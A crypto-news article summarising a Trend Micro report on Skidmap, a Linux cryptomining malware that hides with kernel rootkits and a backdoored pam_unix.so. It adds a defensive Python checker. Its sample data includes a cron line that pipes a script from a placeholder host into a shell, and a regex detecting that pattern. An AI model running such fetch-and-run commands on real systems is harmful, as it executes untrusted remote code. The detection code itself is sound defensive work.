Calling the crypto community! There’s a new threat in town that puts crypto assets in danger. Two threat analysts recently came across a new form of Linux malware, which mines cryptocurrency all the while managing to stay hidden.
Threat analysts Augusto Remillano II and Jakub Urbanec revealed their findings to the public in a post on Trend Micro, a well-known security intelligence blog. They went on to explain that cryptocurrency-mining malware is still a prevalent problem in the crypto space and that, with time, this malware keeps evolving, courtesy of the efforts of cybercriminals.
What makes their recently found malware, dubbed ‘Skidmap’, interesting is the way it loads malicious kernel modules to keep its cryptocurrency-mining operations under the radar. Explaining just how the malware keeps itself hidden, the analysts said that Skidmap does so by utilizing a rootkit, a program that installs and executes code on a system without the consent or knowledge of the end user, thereby remaining undetectable by the infected system’s monitoring tools.
That is not where the malicious activity ends; the aforementioned kernel-mode rootkits can further be used by the attackers to acquire unrestricted access to the infected system. The malicious Skidmap is dangerously advanced because it also has the ability to set up a secret master password that grants it access to any user account present in the compromised system.
Moreover, the analysts add that in addition to setting up ways to gain backdoor access to the targeted machine, Skidmap also creates another access point for its operators. The report further reads:
The malware replaces the system’s pam_unix.so file with its own malicious version. This malicious file accepts a specific password for any users, thus allowing the attackers to log in as any user in the machine.
How does it Operate?
According to the report, the initial infection starts through ‘crontab’, the standard facility on Unix-like systems for scheduling jobs that run periodically.
Then it is on to the second stage, where Skidmap installs numerous malicious binaries, the first of which weakens the infected machine’s security settings so that the malware is in the clear to begin mining cryptocurrency unchecked.
Other binaries are involved in this process as well, one of which is responsible for dropping and installing several loadable kernel modules on the machine. The malware is fairly advanced and operates in complex ways to ensure that it succeeds: for instance, to make sure the infected machine won’t crash because of the kernel-mode rootkits, it uses different modules for specific kernel versions. There is even a module that hides specific files to avoid detection.
Skidmap also fakes network traffic and CPU-related statistics in an attempt to mask its cryptocurrency-mining operation. According to the report, high CPU usage is considered the primary red flag of illicit cryptocurrency mining; therefore a rootkit called netlink fakes these statistics so that the CPU load of the infected machine always appears low, making it look as if nothing is amiss in the system.
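The three host-level indicators the report describes, a tampered pam_unix.so, kernel modules that were not present on a clean baseline, and a cron entry that pulls and runs a remote script, can be checked with package-manager verification, lsmod and crontab output. The following is an added example written for this article, not code from the Trend Micro report or from Skidmap itself; the command outputs, the module name `suspect_mod`, the baseline module set and the cron URL are all constructed sample data.

```python
import re

# Constructed sample output of `rpm -V pam` (dpkg --verify uses the same
# attribute column, where '5' means the file's digest no longer matches).
RPM_VERIFY_OUTPUT = """\
S.5....T.    /usr/lib64/security/pam_unix.so
.......T.    /etc/pam.d/login
"""

# Constructed sample output of `lsmod`; 'suspect_mod' is a placeholder name.
LSMOD_OUTPUT = """\
Module                  Size  Used by
suspect_mod            16384  0
ext4                  700000  1
"""

# Constructed sample output of `crontab -l`; the URL is a placeholder.
CRONTAB_OUTPUT = """\
# m h dom mon dow command
0 3 * * * /usr/bin/updatedb
*/5 * * * * curl -s http://example.invalid/pm.sh | sh
"""

# Modules recorded on a known-clean host of the same build (constructed).
BASELINE_MODULES = {"ext4"}


def modified_pam_files(verify_output):
    """Return PAM module files whose digest ('5') or size ('S') changed."""
    hits = []
    for line in verify_output.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        attrs, path = parts[0], parts[-1]
        if "/security/" in path and ("5" in attrs or "S" in attrs):
            hits.append(path)
    return hits


def unknown_modules(lsmod_output, baseline):
    """Return loaded kernel module names absent from the clean baseline."""
    rows = lsmod_output.splitlines()[1:]  # skip the 'Module Size Used by' header
    loaded = {row.split()[0] for row in rows if row.strip()}
    return sorted(loaded - baseline)


def suspicious_cron_entries(crontab_output):
    """Flag cron jobs that download a script and pipe it straight into a shell."""
    fetch_and_run = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")
    return [row for row in crontab_output.splitlines()
            if not row.startswith("#") and fetch_and_run.search(row)]
```

Run the real commands and feed their output to the same functions; a clean host should return empty lists for all three.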
The complexity and intricacy with which Skidmap operates make it extremely dangerous. According to the report:
Its use of LKM rootkits — given their capability to overwrite or modify parts of the kernel — makes it harder to clean compared to other malware.
If that wasn’t alarming enough, the report also adds that Skidmap has multiple ways to access affected machines, which allows it to reinfect systems that have been restored or cleaned up.
While the report emphasizes the dangers of the new Linux malware and of cryptocurrency-mining threats in general, it does not, however, indicate which cryptocurrency Skidmap illicitly mines.
2019 & Cryptojacking Incidents
The Linux malware might be new and, by the looks of it, highly advanced, but the threat of cryptojacking in general isn’t new. In fact, unfortunately, it remains one of the most prevalent problems plaguing the crypto ecosystem.
As BlockPublisher reported earlier in August, cybersecurity company McAfee Labs released a threat report in which it noted an increase in cryptojacking campaigns and ransomware attacks in Q1 of 2019. The report claimed that the first quarter of 2019 saw a 29% increase in cryptojacking campaigns.